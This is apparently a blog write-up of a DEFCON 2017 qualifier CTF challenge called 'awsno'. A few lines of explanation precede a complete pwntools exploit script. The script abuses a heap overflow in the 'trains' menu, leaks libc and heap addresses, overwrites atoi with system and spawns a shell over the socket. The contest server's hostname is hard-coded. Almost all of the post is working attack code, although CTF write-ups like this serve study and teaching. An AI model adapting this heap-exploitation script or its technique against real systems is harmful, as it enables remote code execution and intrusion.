1. heap overflow in 'trains' menu

2. we can change heap layout by making hole with edit menu. (edit deletes a node and appends new copy at the end of the list)

3. using heap overflow, we can corrupt some objects and hijack RIP.

4. we used special gadget that allows us to do arbitrary write

5. we changed atoi into system and called atoi("sh 0<&4 1>&4"); to get a shell.


- worked with zzoru.





'''

trains name length : 31

'''


from pwn import *

import time

import subprocess

# context.log_level = 'debug'


'''

/form          Nothing.

/index_write   Write within 512 byte buffer.

/planes        pwnable

/trains        pwnable

/vehicles      pwnable

'''


#context.terminal = ['tmux', 'splitw', '-h']


OFFSET = 0xe510

p = None


def main(req, menu, answer):


    req('/trains')

    raw_input('attach...')

    trains_add(p64(0x41414141), p64(0x7474747474), p64(0x53535353), 30, 30)

    trains_add('a', 'ab' * 2, 'c' * 2, 30, 30)

    trains_update(2, 'a' * 1)

    

    fake_1 = '1' + '\x00' * 7 + '\x00' * 8 * 3

    fake_2 = '\x88' * 8 * 4

    fake_3 = '\x77' * 8 + p32(0x14) + p32(0x1) + p32(0xff) + 'c' * 28

    fake_4 = '\x33' * 8 * 6

    fake_5 = '\x65' + '\x00' * 7 + p64(0xa02f58) + p64(0xa02f58) + p64(0x728f60) + p64(0xa02f60-0Xc) + p64(0x728f60) + p64(0x9fc538 - 0xc) + p64(0x728f60) + p64(0x9fc340 - 0xc) 


    # leak stdin

    '''

    atoi addr: 0x7f9f07f6df50

    stdin addr: 0x7f9f082f3640

    '''

    

    trains_index('1' + '\x00' * 7  + fake_1 + fake_2 + fake_3 + fake_2 + fake_3 + fake_2 + fake_4 +  fake_5)

    answer('0')


    menu(2)

    p.recvuntil('Name: ')

    print p.recvuntil('Name: ')

    blabla_addr = unpack(p.recvuntil('Model: ')[:-7], 'all')

    atoi_addr = unpack(p.recvuntil('Type: ')[:-6], 'all')


    trains_add('a', 'b' * 2, 'c' * 2, 30, 30)

    trains_update(3, 'a' * 1)



    RIP = 0x65d0a2


    fake_6 = '\x35' + '\x00' * 7 + p64(RIP) + p64(0xcafebab0) + p64(0xcafe4140) + p64(0xbeef3130) + p64(0xdead5550) 

    fake_7 = '\x65' + '\x00' * 7 + p64(0xa02f58) + p64(0xa11500) + p64(0x728f60) + p64(0xa02f60-0Xc) 

    

    trains_index('1' + '\x00' * 7  + fake_1 + fake_3 + fake_2 + fake_3 + fake_2+ fake_6+ fake_7)

    answer('0')


    menu(2)

    p.recvuntil('Name: ')

    p.recvuntil('Name: ')


    print p.recvuntil('Name: ')

    heap_addr = unpack(p.recvuntil('Model: ')[:-7], 'all') - 0x30

    new_stack = heap_addr - 0x38

    


    CMD = 'sh 0<&4 1>&4'

    DEST = 0x9fc538

    SRC = atoi_addr + OFFSET


    fake_1 = '1' + '\x00' * 7 + '\x99' * 8 * 3

    fake_2 = 'MMMM' + p64(DEST) + p64(SRC) + 'NNNNNNNNNNNN'

    fake_3 = '\x71' * 8 + p32(0x14) + p32(0x1) + p32(0xff) + '123456789' +p64(new_stack)+ 'iopasdfghjk'


    trains_add('a', 'b' * 2, 'c' * 2, 30, 30)

    trains_update(4, 'a' * 1)


    print 'heap addr: 0x%x' % heap_addr

    print 'atoid addr: 0x%x' % atoi_addr


    fake_8 = '\x65' + '\x00' * 7 + p64(0x9fca48 - 0x8) + p64(heap_addr - 0x40)

    trains_index('1' + '\x00' * 7  + fake_1 + fake_2 + fake_3 + fake_2 + fake_3 + fake_2+ fake_6+ fake_8)

    answer('0')


    sleep(0.1)

    menu(4)

    answer('n')

    answer('4')

    answer('n')


    menu(4)

    answer('y')

    answer(CMD)




recvuntil_kind = 0

if __name__ == '__main__':


    import sys

    

    run = int(sys.argv[1])

    if run:

        if 1:

            local_worker = process(['./awsno'], env={'LD_PRELOAD':'./hook.so'})

        else:

            local_worker = subprocess.Popen(['ltrace', '-e', 'malloc', './awsno'], env={'LD_PRELOAD':'./hook.so'})

        time.sleep(0.3)

    else:

        local_worker = None


    local = int(sys.argv[2])

    if local:

        p = remote('localhost', 9345)

    else:

        p = remote('awsno_cfeaa78b474521963ccfd450cd938ce9.quals.shallweplayaga.me', 80)

   

    def req(uri):

        global recvuntil_kind

        if uri == '/trains':

            recvuntil_kind = 1

        r = 'GET %s HTTP/1.1\r\n' % uri

        r += 'Host: awsno_cfeaa78b474521963ccfd450cd938ce9.quals.shallweplayaga.me\r\n'

        r += 'User-Agent: curl/7.47.0\r\n'

        r += 'Accept: */*\r\n'

        r += '\r\n'

        p.send(r)


    def menu(n):

        if recvuntil_kind:

            log.info(p.recvuntil(': '))

        else:

            log.info(p.recvuntil('> '))

        log.warn(n)

        p.send('%d\n' % n)


    def menu2(n):

        if recvuntil_kind:

            log.info(p.recvuntil(': '))

        else:

            log.info(p.recvuntil('> '))

        log.warn(n)

        p.send('4zzzzzzzzzzzzz\n')


    def answer(s):

        if isinstance(s, int):

            s = str(s)

        log.info(p.recvuntil(': '))

        log.warn(s)

        p.send(s + '\n')


    def send_form(text):

        p.send("POST /form" + " HTTP/1.1\r\n")

        p.send("Content-Type: application/x-www-form-urlencoded\r\n")

        payload = "text="+text

        p.send("Content-Length: %d\r\n\r\n" % (len(payload)))

        p.send(payload + "\r\n")

        return p.recv(4096)


    def send_index_write(idx, chr):

        print p.recv(4096)

        p.send(str(idx) +"\n")

        print p.recv(4096)

        p.send(chr)    

        print p.recv(4096)


    def trains_add(name, model, type_, speed, passengers):

        menu(1)

        answer(name)

        answer(model)

        answer(type_)

        answer(str(speed))

        answer(str(passengers))

    

    def trains_list():

        # print 'abc'

        menu(2)


    # not work

    def trains_remove(idx):

        menu(3)

        answer('y')

        answer(str(idx))


    def trains_update(idx, name):

        menu(4)

        answer('y')

        answer(str(idx))

        answer('y')

        answer(name)


    def trains_index(idx):

        menu(7)

        answer(idx)


    try:

        main(req, menu, answer)

        p.interactive()

    finally:

        p.close()

        if local_worker:

            local_worker.kill()


'Games > CTF' 카테고리의 다른 글

DEFCON 2017 empanada writeup  (0) 2017.05.08
DEFCON 2017 awsno writeup  (0) 2017.05.08
SECCON 2016 cheer_msg  (0) 2016.12.12
SECCON 2016 checker  (0) 2016.12.12
SECCON 2016 logger  (0) 2016.12.11
SECCON 2016 jumper  (0) 2016.12.11
Posted by daehee87

댓글을 달아 주세요